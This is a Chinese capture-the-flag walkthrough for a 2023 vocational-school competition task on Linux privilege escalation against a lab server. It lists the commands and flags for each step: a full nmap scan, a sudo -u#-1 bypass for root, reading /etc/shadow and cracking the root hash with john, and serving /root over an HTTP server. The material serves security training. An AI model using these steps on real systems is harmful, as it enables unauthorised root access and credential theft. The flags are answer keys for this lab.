2023年中职“网络安全“—Linux系统渗透提权①

2023年中职"网络安全"---Linux系统渗透提权①

  • Linux系统渗透提权
    • 任务环境说明:
      • [1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;](#1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;)
      • [2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;](#2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;)
      • [3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;](#3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;)
      • [4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;](#4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;)
      • [5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;](#5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;)
      • [6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。](#6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。)

Linux系统渗透提权

任务环境说明:

  • 服务器场景:Server2204(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

bash 复制代码
nmap -p- -sV 靶机IP            # -p- 扫描全部端口,-sV 版本探测

flag: 2283/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

bash 复制代码
ssh hacker@靶机IP -p 2283 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -p 选择端口,-oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接
uname -a             # 查看系统基本信息

legacy.html

flag: KipZ1eze

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

bash 复制代码
uname -a             # 查看系统基本信息

flag: 2.6.32-642.el6.x86_64

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

bash 复制代码
sudo -u#-1 bash                # sudo 版本小于1.8.28,当前用户存在于sudo权限列表
bash 复制代码
cd /root            # 进入root文件夹
ls -la              # 查看当前文件夹下的所有文件,并且以列表方式输出
cat key.txt         # 查看key.txt文本内容

flag: 7QcSI8kK

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

bash 复制代码
cat /etc/shadow            # 查看root的shadow文件
bash 复制代码
vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码

flag: Woodrow

6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

bash 复制代码
pwd                                # 查看当前目录
ls -la              # 查看当前文件夹下的所有文件,并且以列表方式输出
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务
text 复制代码
访问的时候一定要指定8080端口

flag: uB81UvW0

相关推荐
云途行者2 分钟前
使用 docker 安装 openldap
运维·docker·容器
群联云防护小杜9 分钟前
深度隐匿源IP:高防+群联AI云防护防绕过实战
运维·服务器·前端·网络·人工智能·网络协议·tcp/ip
YuTaoShao20 分钟前
【LeetCode 热题 100】994. 腐烂的橘子——BFS
java·linux·算法·leetcode·宽度优先
退役小学生呀23 分钟前
十五、K8s可观测能力:日志收集
linux·云原生·容器·kubernetes·k8s
van叶~24 分钟前
Linux探秘坊-------15.线程概念与控制
linux·运维·服务器
Andy杨2 小时前
20250718-1-Kubernetes 应用程序生命周期管理-应用部署、升级、弹性_笔记
linux·docker·容器
2301_780789664 小时前
UDP和TCP的主要区别是什么
服务器·网络协议·web安全·网络安全·udp
天天进步20156 小时前
前端安全指南:防御XSS与CSRF攻击
前端·安全·xss
写写闲篇儿6 小时前
Python+MongoDB高效开发组合
linux·python·mongodb
一只栖枝6 小时前
HCIA-Security 认证精讲!网络安全理论与实战全掌握
网络·web安全·网络安全·智能路由器·hcia·it·hcia-security